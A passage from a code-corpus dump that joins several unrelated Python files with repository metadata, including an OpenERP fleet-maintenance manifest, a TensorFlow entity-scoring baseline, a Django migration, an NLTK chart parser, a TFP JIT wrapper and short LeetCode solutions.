configuration.kwargs,
["column", "mostly", "row_condition", "condition_parser"],
)
| [
"noreply@github.com"
] | spbail.noreply@github.com |
5b2498d10e6e0f7de3e78241053183a155df9a95 | ce73929de648d080420fc99a86e7b73bfb15f0dc | /tms_maintenance/__openerp__.py | 67959bfef32db6801dfb3d8b4b7b99f04d6e8f0e | [] | no_license | thinkasoft/TMS | dce16ee4b10f9e35d392c883b443f556946d9526 | d8d07227749e07e047a03713142c0bb898a9abf6 | refs/heads/master | 2021-01-10T02:31:22.526633 | 2016-02-01T22:25:00 | 2016-02-01T22:25:00 | 50,875,749 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,922 | py | # -*- encoding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2012 HESATEC (<http://www.hesatecnica.com>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
###############################################################################
{
"name" : "Fleet Maintenance Workshop Management",
"version" : "1.0",
"category" : "Vertical",
'complexity': "normal",
"author" : "HESATEC",
"website": "http://www.hesatecnica.com",
"depends" : ["tms","stock_move_entries"],
"description": """
Fleet Maintenance Workshop Management
=========================================
This application allows you to manage an Fleet Maintenance Workshop, very useful when Compnay has its own Maintenance Workshop.
It handles full Maintenance Workflow:
Opening Maintenance Order => Warehouse Integration => Closing Maintenance Order
Also, you can manage:
- Several Workshops
- Preventive Maintenance Cycles
- Corrective Maintenance
- Warehouse Integration for spare parts
Takes from Freight Management Module:
- Vehicles
- Trucks Red Tapes
- Truck Odometers
""",
"data" : [
'security/tms_security.xml',
'security/ir.model.access.csv',
'product_view.xml',
'tms_maintenance_view.xml',
'tms_maintenance_order_view.xml',
'tms_maintenance_order_activity_view.xml',
'tms_product_line_view.xml',
'sale_view.xml',
'tms_activity_control_time_view.xml',
'tms_time_view.xml',
'tms_analisys_01_view.xml',
'tms_analisys_02_view.xml',
'tms_analisys_03_view.xml',
'tms_analisys_04_view.xml',
#'tms_analisys_05_view.xml',
#'activities_to_invoice_view.xml',
#'create_invoice_view.xml',
'stock_view.xml',
'tms_maintenance_driver_report_view.xml',
'ir_config_parameter.xml'
],
"active": False,
'application': True,
"installable": True
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| [
"you@example.com"
] | you@example.com |
2777fc95d9b7160b0a91a6bd8f318fee534d933e | 8bccc05fcb3cfc6ed93991927a514a96f53f7ec0 | /old_version/candidate_selection/tensorflow_models/baselines/entity_embedding_vs_gold.py | bf4932a2a4dc0e677e69a935306211c2a78dac5a | [
"MIT"
] | permissive | afcarl/QuestionAnsweringGCN | 54101c38549405d65ef22e38fed9e5bd58122ada | e9c1987b40a553f0619fa796f692c8880de32846 | refs/heads/master | 2020-03-20T10:35:55.729170 | 2018-06-07T11:45:12 | 2018-06-07T11:45:12 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,137 | py | import tensorflow as tf
from candidate_selection.tensorflow_hypergraph_representation import TensorflowHypergraphRepresentation
from candidate_selection.tensorflow_models.abstract_tensorflow_model import AbstractTensorflowModel
from candidate_selection.tensorflow_models.components.decoders.softmax_decoder import SoftmaxDecoder
from candidate_selection.tensorflow_models.components.embeddings.sequence_embedding import SequenceEmbedding
from candidate_selection.tensorflow_models.components.embeddings.static_vector_embedding import StaticVectorEmbedding
from candidate_selection.tensorflow_models.components.embeddings.vector_embedding import VectorEmbedding
from candidate_selection.tensorflow_models.components.extras.embedding_retriever import EmbeddingRetriever
from candidate_selection.tensorflow_models.components.extras.mean_gold_embedding_retriever import \
MeanGoldEmbeddingRetriever
from candidate_selection.tensorflow_models.components.extras.target_comparator import TargetComparator
from candidate_selection.tensorflow_models.components.vector_encoders.multilayer_perceptron import MultilayerPerceptron
from candidate_selection.tensorflow_sentence_representation import TensorflowSentenceRepresentation
class EntityEmbeddingVsGold(AbstractTensorflowModel):
    """Baseline model that scores candidate entities by comparing each
    entity-vertex embedding against the mean embedding of the gold entities.

    Graph construction is TF1-style: components are registered in
    initialize_graph and the score op is assembled in compute_entity_scores.
    """

    def get_preprocessor_stack_types(self):
        """Return the preprocessor stages this model needs; static entity
        embeddings add an extra stage when enabled in model_settings."""
        preprocessor_stack_types = ["hypergraph", "gold", "sentence"]
        if self.model_settings["static_entity_embeddings"]:
            preprocessor_stack_types += ["static_entity_embeddings"]
        return preprocessor_stack_types

    def initialize_graph(self):
        """Instantiate and register every model component.

        NOTE(review): the word-embedding / sentence-representation components
        are commented out below -- presumably the sentence side is unused in
        this baseline; confirm before re-enabling.
        """
        # Entity embeddings: trainable by default, frozen when configured static.
        if not self.model_settings["static_entity_embeddings"]:
            self.entity_embedding = VectorEmbedding(self.entity_indexer, self.variables, variable_prefix="entity")
            self.add_component(self.entity_embedding)
        else:
            self.entity_embedding = StaticVectorEmbedding(self.entity_indexer, self.variables, variable_prefix="entity")
            self.add_component(self.entity_embedding)

        self.hypergraph = TensorflowHypergraphRepresentation(self.variables)
        self.add_component(self.hypergraph)

        # Retrieves the mean embedding of the gold entities for comparison.
        self.mean_gold_embedding_retriever = MeanGoldEmbeddingRetriever(self.variables, variable_prefix="gold_lookup")
        self.add_component(self.mean_gold_embedding_retriever)

        #self.question_sentence = TensorflowSentenceRepresentation(self.variables)
        #self.add_component(self.question_sentence)
        #self.word_embedding = SequenceEmbedding(self.word_indexer, self.variables, variable_prefix="word")
        #self.add_component(self.word_embedding)

        # Concatenates gold vs. vertex embeddings prior to the final MLP.
        self.target_comparator = TargetComparator(self.variables, variable_prefix="comparison_to_sentence", comparison="concat")
        self.add_component(self.target_comparator)

        self.decoder = SoftmaxDecoder(self.variables)
        self.add_component(self.decoder)

        self.sentence_to_graph_mapper = EmbeddingRetriever(self.variables, duplicate_policy="sum", variable_prefix="mapper")
        self.add_component(self.sentence_to_graph_mapper)

        self.transformation = MultilayerPerceptron([self.model_settings["entity_embedding_dimension"],
                                                    self.model_settings["entity_embedding_dimension"]],
                                                   self.variables,
                                                   variable_prefix="transformation",
                                                   l2_scale=self.model_settings["regularization_scale"])
        self.add_component(self.transformation)

        self.vertex_transformation = MultilayerPerceptron([self.model_settings["entity_embedding_dimension"],
                                                           self.model_settings["entity_embedding_dimension"]],
                                                          self.variables,
                                                          variable_prefix="transformation",
                                                          l2_scale=self.model_settings["regularization_scale"])
        self.add_component(self.vertex_transformation)

        # Maps the concatenated pair down to a single scalar score per vertex.
        self.final_transformation = MultilayerPerceptron([2*self.model_settings["entity_embedding_dimension"],
                                                          4 * self.model_settings["entity_embedding_dimension"],
                                                          1],
                                                         self.variables,
                                                         variable_prefix="transformation",
                                                         l2_scale=self.model_settings["regularization_scale"])
        self.add_component(self.final_transformation)

    def set_indexers(self, indexers):
        """Store the entity indexer used to build the embedding table."""
        self.entity_indexer = indexers.entity_indexer

    def compute_entity_scores(self):
        """Build and return the per-vertex score tensor.

        NOTE(review): the tf.Print calls below are leftover debug
        instrumentation (deprecated in TF>=1.13) -- consider removing.
        """
        self.hypergraph.entity_vertex_embeddings = self.entity_embedding.get_representations()
        self.hypergraph.entity_vertex_embeddings = tf.Print(self.hypergraph.entity_vertex_embeddings, [self.hypergraph.entity_vertex_embeddings], message="embeddings", summarize=100)
        gold_embeddings = self.mean_gold_embedding_retriever.get_representations(self.hypergraph.entity_vertex_embeddings)

        #gold_embeddings = tf.Print(gold_embeddings, [gold_embeddings], message="Gold: ", summarize=5)
        #gold_embeddings = self.transformation.transform(gold_embeddings)
        # The learned transformations are bypassed here; raw embeddings are compared.
        vertex_embeddings = self.hypergraph.entity_vertex_embeddings #self.vertex_transformation.transform(self.hypergraph.entity_vertex_embeddings)
        #gold_embeddings = tf.Print(gold_embeddings, [self.hypergraph.entity_vertex_embeddings], message="Vertices: ", summarize=100)

        hidden = self.target_comparator.get_comparison_scores(gold_embeddings, vertex_embeddings)
        entity_scores = tf.squeeze(self.final_transformation.transform(hidden))
        entity_scores = tf.Print(entity_scores, [entity_scores], summarize=25, message="entity_scores: ")
        #entity_scores = tf.Print(entity_scores, [entity_scores], message="Scores: ", summarize=25)
        return entity_scores
"michael.sejr@gmail.com"
] | michael.sejr@gmail.com |
733d22a07c4e1178875dce93e145e10c84489699 | c68d238ac786a42c4dd47d4ab5820709aa4dcdb3 | /ExFin/credit/migrations/0003_creditrateup.py | 2057cb69f91adc42bdaa82ecbdcd2ee1441e312d | [] | no_license | tenebranum/ExFin | b78d2a9651d5b9e8fb0fae3adccc48f7897221d2 | 7ac7b7a0be00537a6a600721009f4a28eb90c3ab | refs/heads/master | 2022-12-14T21:17:02.334600 | 2022-09-21T10:33:27 | 2022-09-21T10:33:27 | 139,338,729 | 0 | 0 | null | 2022-12-08T00:59:15 | 2018-07-01T15:07:52 | Python | UTF-8 | Python | false | false | 1,110 | py | # Generated by Django 2.0.2 on 2018-03-06 14:58
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('credit', '0002_auto_20180303_1408'),
]
operations = [
migrations.CreateModel(
name='CreditRateUp',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('icon_class', models.CharField(choices=[('cash', 'Наличка'), ('stick-man', 'Пенсионер'), ('sticker', 'Стикер')], max_length=128, verbose_name='Иконка')),
('credit_rate', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='credit.CreditRate', verbose_name='Кредитный тариф')),
],
options={
'verbose_name_plural': 'Популярные кредитные тарифы, вверху на главной',
'verbose_name': 'Популярный кредитный тариф',
},
),
]
| [
"vetal969696@gmail.com"
] | vetal969696@gmail.com |
5066a140ff8819c7e2b0f4236f3dadc455c60f9e | 72328633f1b4640868c2ba7af81adcca6350e7da | /07-动态规划/2-动态规划问题/03-064.py | a9ae8d6e8865cff23c72daa24b567b07e52219f0 | [] | no_license | qiaozhi827/leetcode-1 | a9f10192c74a6de498bce0fa7e1d995bf67edec4 | 1d1ffe25d8b49832acc1791261c959ce436a6362 | refs/heads/master | 2022-11-06T19:39:32.792946 | 2020-07-05T06:23:27 | 2020-07-05T06:23:27 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 872 | py | class Solution(object):
def minPathSum(self, grid):
"""
:type grid: List[List[int]]
:rtype: int
"""
m = len(grid)
if m == 0:
return 0
n = len(grid[0])
for j in range(1,n):
grid[0][j] += grid[0][j-1]
for i in range(1,m):
grid[i][0] += grid[i-1][0]
for i in range(1,m):
for j in range(1, n):
grid[i][j] = grid[i][j] + min(grid[i-1][j], grid[i][j-1])
return grid[-1][-1]
if __name__ == '__main__':
    obj = Solution()
    # Read grids from stdin until input ends: first the row count m, then
    # m rows of space-separated integers; print each grid's minimal path sum.
    while True:
        m = int(input())
        grid = []
        for i in range(m):
            nums_str = input().strip().split()
            nums = list(map(int, nums_str))
            grid.append(nums)
        res = obj.minPathSum(grid)
        print(res)
| [
"czy36mengfei@163.com"
] | czy36mengfei@163.com |
0da170eeb4c9c974c1cd842b20ba915ea9ff5e14 | b26c41926fa3a7c2c061132d80e91a2750f2f468 | /tensorflow_probability/python/experimental/util/jit_public_methods.py | 927285368770ee307c5f7c058aa83b3846574dff | [
"Apache-2.0"
] | permissive | tensorflow/probability | 22e679a4a883e408f8ef237cda56e3e3dfa42b17 | 42a64ba0d9e0973b1707fcd9b8bd8d14b2d4e3e5 | refs/heads/main | 2023-09-04T02:06:08.174935 | 2023-08-31T20:30:00 | 2023-08-31T20:31:33 | 108,053,674 | 4,055 | 1,269 | Apache-2.0 | 2023-09-13T21:49:49 | 2017-10-23T23:50:54 | Jupyter Notebook | UTF-8 | Python | false | false | 5,174 | py | # Copyright 2021 The TensorFlow Probability Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""A wrapper to XLA-compile an object's public methods."""
import tensorflow.compat.v2 as tf
from tensorflow_probability.python.distributions import distribution as distribution_lib
from tensorflow_probability.python.distributions import kullback_leibler
__all__ = [
    'DEFAULT_METHODS_EXCLUDED_FROM_JIT',
    'JitPublicMethods'
]
# Backend switch flags; presumably rewritten to True by TFP's backend
# build tooling for the JAX/NumPy substrates — confirm against the rewrite
# scripts.
JAX_MODE = False
NUMPY_MODE = False
# Methods/properties left unwrapped by default: shape/dtype accessors and
# other members that do not take or return Tensors.
DEFAULT_METHODS_EXCLUDED_FROM_JIT = (
    # tfd.Distribution
    'event_shape',
    'event_shape_tensor',
    'batch_shape',
    'batch_shape_tensor',
    'dtype',
    'kl_divergence',  # Wrapping applied explicitly in `_traced_kl_divergence`.
    'experimental_default_event_space_bijector',
    'experimental_local_measure',
    # tfb.Bijector
    # TODO(davmre): Test wrapping bijectors.
    'forward_event_shape',
    'forward_event_shape_tensor',
    'inverse_event_shape',
    'inverse_event_shape_tensor',
    'forward_dtype',
    'inverse_dtype',
    'forward_event_ndims',
    'inverse_event_ndims',
    'experimental_compute_density_correction',
)
if NUMPY_MODE:
  # The NumPy backend has no compiler, so wrapping is the identity.
  JitPublicMethods = lambda f, trace_only=False: f
else:
  class JitPublicMethods(object):
    """Wrapper to compile an object's public methods using XLA."""
    def __init__(self,
                 object_to_wrap,
                 trace_only=False,
                 methods_to_exclude=DEFAULT_METHODS_EXCLUDED_FROM_JIT):
      """Wraps an object's public methods using `tf.function`/`jax.jit`.
      Args:
        object_to_wrap: Any Python object; for example, a
          `tfd.Distribution` instance.
        trace_only: Python `bool`; if `True`, the object's methods are
          not compiled, but only traced with `tf.function(jit_compile=False)`.
          This is only valid in the TensorFlow backend; in JAX, passing
          `trace_only=True` will raise an exception.
          Default value: `False`.
        methods_to_exclude: List of Python `str` method names not to wrap.
          For example, these may include methods that do not take or return
          Tensor values. By default, a number of `tfd.Distribution` and
          `tfb.Bijector` methods and properties are excluded (e.g.,
          `event_shape`, `batch_shape`, `dtype`, etc.).
          Default value:
            tfp.experimental.util.DEFAULT_METHODS_EXCLUDED_FROM_JIT`
      """
      self._object_to_wrap = object_to_wrap
      self._methods_to_exclude = methods_to_exclude
      self._trace_only = trace_only
    @property
    def methods_to_exclude(self):
      return self._methods_to_exclude
    @property
    def trace_only(self):
      return self._trace_only
    @property
    def object_to_wrap(self):
      return self._object_to_wrap
    def copy(self, **kwargs):
      # Copy the wrapped object (forwarding kwargs) and re-wrap the copy
      # with the same jit settings.
      return type(self)(self.object_to_wrap.copy(**kwargs),
                        trace_only=self.trace_only,
                        methods_to_exclude=self.methods_to_exclude)
    def __getitem__(self, slices):
      # Indexing/slicing the wrapped object (e.g. batch slicing) re-wraps
      # the result as well.
      return type(self)(self.object_to_wrap[slices],
                        trace_only=self.trace_only,
                        methods_to_exclude=self.methods_to_exclude)
    def __getattr__(self, name):
      # Note: this method is called only as a fallback if an attribute isn't
      # otherwise set.
      if name == 'object_to_wrap':
        # Avoid triggering an infinite loop if __init__ hasn't run yet.
        raise AttributeError()
      attr = getattr(self.object_to_wrap, name)
      if callable(attr):
        if not (name.startswith('_') or name in self.methods_to_exclude):
          # On the first call to a method, wrap it, and store the wrapped
          # function to be reused by future calls.
          attr = tf.function(autograph=False,
                             jit_compile=not self.trace_only)(attr)
          setattr(self, name, attr)
      return attr
@kullback_leibler.RegisterKL(JitPublicMethods, distribution_lib.Distribution)
@kullback_leibler.RegisterKL(distribution_lib.Distribution, JitPublicMethods)
@kullback_leibler.RegisterKL(JitPublicMethods, JitPublicMethods)
def _compiled_kl_divergence(d1, d2, name=None):
  """Compiled KL divergence between two distributions."""
  # jit-compile unless every *wrapped* operand requested trace-only
  # behavior; unwrap JitPublicMethods operands before computing.
  trace_only = True
  if isinstance(d1, JitPublicMethods):
    trace_only &= d1.trace_only
    d1 = d1.object_to_wrap
  if isinstance(d2, JitPublicMethods):
    trace_only &= d2.trace_only
    d2 = d2.object_to_wrap
  return tf.function(autograph=False, jit_compile=not trace_only)(
      d1.kl_divergence)(d2, name=name)
| [
"gardener@tensorflow.org"
] | gardener@tensorflow.org |
8e9e7723d0d08bab41f6b2e74af3f118ff5cb2e3 | 53e90091d10a2454e14a02ecc689e355ac2a7cc1 | /book3/pylisting/code_wfst.py | e3d6c5128b16804c82c340c83396238548917d71 | [] | no_license | dougalg/nltk.github.com | aac74cf03d17475adc177ac08691359cb1f4adb6 | 9a04ac5264f5ef08d87d6b920580c9160042f1a0 | refs/heads/master | 2020-12-07T17:15:15.894232 | 2014-04-21T14:11:17 | 2014-04-21T14:11:17 | 18,965,594 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,326 | py | # Natural Language Toolkit: code_wfst
def init_wfst(tokens, grammar):
    """Build an (n+1) x (n+1) chart whose cell [i][i+1] holds the lexical
    category of tokens[i]; every other cell starts out empty (None)."""
    n = len(tokens)
    chart = [[None] * (n + 1) for _ in range(n + 1)]
    for i, token in enumerate(tokens):
        lexical = grammar.productions(rhs=token)
        chart[i][i + 1] = lexical[0].lhs()
    return chart
def complete_wfst(wfst, tokens, grammar, trace=False):
    """Fill the chart bottom-up (CKY style): whenever two adjacent spans
    carry categories matching the RHS of a binary production, label the
    combined span with that production's LHS. Returns the mutated chart."""
    lhs_for = dict((prod.rhs(), prod.lhs()) for prod in grammar.productions())
    n = len(tokens)
    for width in range(2, n + 1):
        for start in range(n + 1 - width):
            end = start + width
            for split in range(start + 1, end):
                left, right = wfst[start][split], wfst[split][end]
                if left and right and (left, right) in lhs_for:
                    wfst[start][end] = lhs_for[(left, right)]
                    if trace:
                        print("[%s] %3s [%s] %3s [%s] ==> [%s] %3s [%s]" % \
                            (start, left, split, right, end, start, lhs_for[(left, right)], end))
    return wfst
def display(wfst, tokens):
    # Pretty-print the chart: a header row of end indices, then one row per
    # start index, with '.' standing in for empty (None) cells.
    print('\nWFST ' + ' '.join([("%-4d" % i) for i in range(1, len(wfst))]))
    for i in range(len(wfst)-1):
        print("%d " % i, end=" ")
        for j in range(1, len(wfst)):
            print("%-4s" % (wfst[i][j] or '.'), end=" ")
        print()
| [
"stevenbird1@gmail.com"
] | stevenbird1@gmail.com |
c413c0507a2af69c905edbbce39795ea9ae12c2d | c9000e5e30825b29febbefa5ad00da1f57551f8e | /04/zhumeichao/Login.py | b425be01877d8e9766d6f68f886054ccc3d22165 | [] | no_license | xiaotian1991/actual-10-homework | 81c58b24f58fc87e4890f1475ad83de8b66ee53b | 0b379ca6189f843f121df4db5814c83262f9981a | refs/heads/master | 2021-06-12T23:35:52.954510 | 2017-03-24T07:41:18 | 2017-03-24T07:41:18 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 388 | py | #!/usr/bin/env python
#encoding=utf-8
import Usermod
# Simple console menu (Python 2): '1' logs in against users stored in
# user.txt, '2' registers a new user; anything else prints usage help.
num=raw_input("<登陆1> <注册2>\n 请输入操作数字:")
if num == '1':
    userinfo=Usermod.userlist("user.txt")
    Usermod.userlogin(userinfo)
elif num == '2':
    userinfo=Usermod.userlist("user.txt")
    Usermod.adduser(userinfo,"user.txt")
else:
    print "PS:\t输入数字1 ->登陆\n\t输入数字2 ->注册"
| [
"shengxinjing@addnewer.com"
] | shengxinjing@addnewer.com |
2f468e02b23ded4932329802f1f8dbd8609875d0 | 17f1811abda6c828460b77f460671f9c2f464204 | /leetcode/duplicates_list.py | ce3849e0269c3d72f27886e3afb9af07c0d8ac5a | [] | no_license | rishabhranawat/challenge | f10f69fc30881a0571c4321b466a89aeeb06e568 | e836343be5185f8843bb77197fccff250e9a77e3 | refs/heads/master | 2021-01-21T15:13:47.590675 | 2020-04-25T15:26:42 | 2020-04-25T15:26:42 | 91,833,947 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 777 | py | # Problem Source: LeetCode
# Given an array of integers, 1 ≤ a[i] ≤ n (n = size of array),
# some elements appear twice and others appear once.
# Find all the elements that appear twice in this array.
# Could you do it without extra space and in O(n) runtime?
# Example:
# Input:
# [4,3,2,7,8,2,3,1]
# Output:
# [2,3]
### ### ###
def findDuplicates(nums):
    """
    :type nums: List[int]
    :rtype: List[int]

    Sort a copy, then scan adjacent pairs: equal neighbours are a
    duplicate (each value appears at most twice per the problem), so skip
    both; otherwise advance by one. Duplicates come out in ascending order.
    """
    ordered = sorted(nums)
    dupes = []
    idx = 0
    while idx + 1 < len(ordered):
        if ordered[idx] == ordered[idx + 1]:
            dupes.append(ordered[idx])
            idx += 2
        else:
            idx += 1
    return dupes
print(findDuplicates([4,3,2,7,8,2,3,1])) | [
"rishabhranawat12345@gmail.com"
] | rishabhranawat12345@gmail.com |
63755929f03cbc64d858991d90397a001ce08a5b | 1b0846fddb7c1e8c09e080db40dca9a9590a2519 | /news_scrap/migrations/0005_auto_20180806_0954.py | e7b63894612a3e74bc3b7d6d63fbee799f71a2e0 | [] | no_license | Serdiuk-Roman/self-written_project | 3d657982e95112fa1031241a8f8e2ee138533450 | 3aa0e733173871c2da692deb1a9346e635f90e75 | refs/heads/master | 2022-12-11T11:25:59.841042 | 2018-08-07T19:53:01 | 2018-08-07T19:53:01 | 143,103,670 | 0 | 0 | null | 2022-12-08T02:19:51 | 2018-08-01T04:25:21 | Python | UTF-8 | Python | false | false | 392 | py | # Generated by Django 2.0.7 on 2018-08-06 09:54
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('news_scrap', '0004_auto_20180627_0759'),
]
operations = [
migrations.AlterField(
model_name='shortnews',
name='news_link',
field=models.URLField(unique=True),
),
]
| [
"serdiuk.r@gmail.com"
] | serdiuk.r@gmail.com |
8385accd5777109597a2d31c8effe9b4dffa447a | 42229d7c76c305cfde63659ad715a4e6bef0ea99 | /goods/test/class_inside_distance.py | 20bc5d36fc8d67eb626ddc098a24d94d68ce79a3 | [] | no_license | LRJliurj/GoodsServer | 4a043d2f1195e4793aad327732201375495a88f9 | c8c1bbda4fa4ba2a0e8a4055a67b7278ddb15b03 | refs/heads/master | 2020-07-05T14:03:58.536658 | 2019-09-24T03:01:53 | 2019-09-24T03:01:53 | 202,668,466 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,411 | py | __author__ = 'admin'
# *_*coding:utf-8 *_*
import numpy as np
import os
from goods.util import distance_util
#计算单个商品类内差异值
def inside_distance(img_feature_path,img_dis_path):
    """Compute pairwise distances between all image-feature vectors of one
    product class and write them, sorted largest-first, to img_dis_path.

    Each input line is "filename,f1,f2,..."; each output line is
    "name1---name2,distance". Uses distance_util.pcos (presumably cosine
    similarity — confirm against distance_util).
    """
    img_features = {}
    with open(img_feature_path,'r') as f:
        lines = f.readlines()
        for line in lines:
            feature = line.split(",")
            filename = feature[0]
            feature = feature[1:]
            feat = []
            for fea in feature:
                feat.append(float(fea))
            img_features[filename] = feat
    img_dis={}
    # All ordered pairs, including self-pairs (n^2 entries; debug prints kept).
    for img_feature1 in img_features:
        for img_feature2 in img_features:
            print (len(img_features[img_feature1]))
            print(len(img_features[img_feature2]))
            dis = distance_util.pcos(img_features[img_feature1],img_features[img_feature2])
            img_dis[img_feature1+"---"+img_feature2] = dis
            print (img_feature1+"---"+img_feature2,str(dis))
    # Sort pairs by distance value, descending.
    a = sorted(img_dis.items(), key=lambda x: x[1], reverse=True)
    print (a)
    with open(img_dis_path,'w') as f:
        for key in a:
            f.write(key[0]+","+str(float(key[1])))
            f.write("\n")
if __name__=='__main__':
    # Bray-Curtis distance (translated comment; NOTE(review): the code
    # actually calls distance_util.pcos, which looks like cosine — confirm).
    img_feature_path = "E:\\opt\\data\\feature_top\\69024894.txt"
    img_dis_path = "E:\\opt\\data\\feature_top\\step2_inside_cos\\69024894.txt"
    inside_distance(img_feature_path,img_dis_path)
| [
"908601417@qq.com"
] | 908601417@qq.com |
937536e97205603aaafc55317b87850a6abf7d9e | 54f395d77fd98fce2e42f9883953118a4cd74cf8 | /test/socket_overload.py | 96ca82600e39f9deba4e315164d0ed83b6752451 | [] | no_license | zdimon/angular-chat | bfdaa0cb5861da03764402202179711edb92c131 | 483ddf675e8c6233b3a0642b9aa86fe058ef9e44 | refs/heads/master | 2020-04-06T05:30:52.957098 | 2017-01-31T12:12:00 | 2017-01-31T12:12:00 | 39,195,268 | 0 | 1 | null | 2015-09-08T13:27:47 | 2015-07-16T12:21:08 | Python | UTF-8 | Python | false | false | 1,090 | py | import websocket
from websocket import create_connection
import logging
import json
import sys, os
sys.path.append(os.path.join(os.path.dirname(__file__), '../djapp'))
import brukva
bclient = brukva.Client()
bclient.connect()
import time
def test_brukva():
    """Flood the 'test_test' Redis channel with one million close_room
    messages via brukva (overload/load test; Python 2)."""
    mes = { 'action': 'close_room' }
    print 'send to test_test'
    for i in range(1000000):
        bclient.publish('test_test', json.dumps(mes))
def test():
    """Open a WebSocket to the local chat server, send a connect message on
    open, and echo incoming messages; blocks inside run_forever()."""
    def on_message(ws, message):
        print message
    def on_error(ws, error):
        #print error
        print 'errrrrr'
    def on_close(ws):
        print "### closed ###"
    def on_open(ws):
        # Handshake payload sent as soon as the socket opens.
        print 'start serve'
        data = { 'action': 'connect', 'tpa': 'test', 'user_id': '150032', 'source': 'site' }
        ws.send(json.dumps(data))
    ws = websocket.WebSocketApp("ws://localhost:8889/ws",
                              on_message = on_message,
                              on_error = on_error,
                              on_close = on_close)
    ws.on_open = on_open
    ws.run_forever()
    ws.close()
if __name__ == '__main__':
    test()
    # Re-import is redundant (sys is imported at module top) but harmless.
    import sys
    sys.exit("quit")
| [
"zdimon77@gmail.com"
] | zdimon77@gmail.com |
3c89317045ceea3ccaeb459a84d66c919258d4ca | 4e02d5b0b1b0739553fd40bbbdfb0d02c9830350 | /0387_First_Unique_Character_in_a_String.py | 5434e1b8da203b3a94bc89b9f30006df155d5acb | [] | no_license | bingli8802/leetcode | b039ab6af62f0c8992463393f561caafd21056e6 | a509b383a42f54313970168d9faa11f088f18708 | refs/heads/master | 2023-03-29T03:11:45.801090 | 2021-03-23T22:55:16 | 2021-03-23T22:55:16 | 279,321,659 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 730 | py | class Solution(object):
def firstUniqChar(self, s):
"""
:type s: str
:rtype: int
"""
if not s:
return -1
res = float('inf')
dic = defaultdict(list)
for i, v in enumerate(s):
dic[v].append(i)
for val in dic.values():
if len(val) == 1:
res = min(res, val[0])
if res == float('inf'):
return -1
else:
return res
# if index are the same
def firstUniqChar(self, s):
"""
:type s: str
:rtype: int
"""
for i in s:
if s.find(i) == s.rfind(i):
return s.find(i)
return -1
| [
"noreply@github.com"
] | bingli8802.noreply@github.com |
ca1f2f962c2c3961e8d6261325d768ab71aad657 | 15f321878face2af9317363c5f6de1e5ddd9b749 | /solutions_python/Problem_136/1267.py | f52e8c78ada28936bf0480feb093bd78584889c3 | [] | no_license | dr-dos-ok/Code_Jam_Webscraper | c06fd59870842664cd79c41eb460a09553e1c80a | 26a35bf114a3aa30fc4c677ef069d95f41665cc0 | refs/heads/master | 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 714 | py | #!/usr/bin/env python
# vim: set filetype=python et sw=4 ts=4:
import sys
# solve() recurses once per farm purchase; raise the default limit.
sys.setrecursionlimit(1024*1024)
# Number of test cases (first line of input).
T = int(sys.stdin.readline())
def seconds_to_reach(target, rate):
    """Seconds needed to accumulate `target` cookies at `rate` cookies/sec."""
    return target/rate
def solve(C, F, X, rate):
    """Optimal total seconds to reach X cookies at production `rate`,
    where a farm costs C cookies and adds F cookies/sec.

    Greedy: buy another farm exactly when doing so strictly lowers the
    projected finish time; otherwise just wait out the goal.
    """
    time_if_wait = X / rate
    time_if_buy = C / rate + X / (rate + F)
    if time_if_buy >= time_if_wait:
        return time_if_wait
    return C / rate + solve(C, F, X, rate + F)
for case in xrange(T):
    # Each case line holds: C (farm cost), F (farm rate bonus), X (goal).
    C, F, X = [float(x) for x in sys.stdin.readline().split()]
    # Initial production rate is 2.0 cookies/sec.
    sys.stdout.write("Case #%d: %.7f" % (case + 1, solve(C, F, X, 2.0)))
    sys.stdout.write("\n")
| [
"miliar1732@gmail.com"
] | miliar1732@gmail.com |
163b4a862ee387590032965b8fa924cb93c8285d | c68c841c67f03ab8794027ff8d64d29356e21bf1 | /Two Sum.py | 3abbd4c8b7c4aa74e47f5b64b07dc156c8fd010a | [] | no_license | jke-zq/my_lintcode | 430e482bae5b18b59eb0e9b5b577606e93c4c961 | 64ce451a7f7be9ec42474f0b1164243838077a6f | refs/heads/master | 2020-05-21T20:29:11.236967 | 2018-06-14T15:14:55 | 2018-06-14T15:14:55 | 37,583,264 | 8 | 2 | null | null | null | null | UTF-8 | Python | false | false | 1,182 | py | class Solution:
"""
@param numbers : An array of Integer
@param target : target = numbers[index1] + numbers[index2]
@return : [index1 + 1, index2 + 1] (index1 < index2)
"""
def twoSum(self, numbers, target):
# write your code here
# if not numbers:
# return []
# sortedList = []
# for i, n in enumerate(numbers):
# sortedList.append((n, i))
# sortedList.sort()
# length = len(numbers)
# left, right = 0, length - 1
# while left < right:
# total = sortedList[left][0] + sortedList[right][0]
# if total > target:
# right -= 1
# elif total < target:
# left += 1
